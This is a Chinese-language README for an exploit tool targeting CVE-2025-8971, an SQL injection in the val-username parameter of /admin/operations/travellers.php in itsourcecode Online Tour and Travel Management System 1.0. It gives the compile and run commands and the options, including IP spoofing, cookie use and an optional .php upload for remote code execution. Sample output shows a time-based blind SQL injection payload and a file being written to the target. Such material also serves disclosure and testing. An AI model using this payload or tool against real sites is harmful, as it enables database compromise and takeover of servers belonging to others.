作者:Byte Reaper
此漏洞利用程序针对 CVE-2025-8971,这是 itsourcecode Online Tour and Travel Management System 1.0 中的一个 SQL 注入漏洞。 该漏洞存在于 /admin/operations/travellers.php 中,可通过 val-username 参数远程利用。
工作原理
漏洞利用程序向目标 URL 发送精心构造的 HTTP POST 请求。
有效载荷经过编码后注入到 val-username 中。
可选的文件上传(.php 或图片)可用于实现远程代码执行。
脚本会验证响应以检查有效载荷是否成功执行。
GCC compiler (gcc)
Linux x86_64
ibcurl
gcc script.c argparse.c -o CVE-2025-8971 -lcurl
./CVE-2025-8971 -u http://<target> -v [verbose mode]
-h, --help 帮助信息
-u, --url 目标 URL(基础 URL)
-c, --cookies 文件 cookies
-i, --ip 伪造 IP(Host 请求)
-f, --file 文件上传(.php / 图片)
-v, --verbose 详细模式
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....
MIT 许可证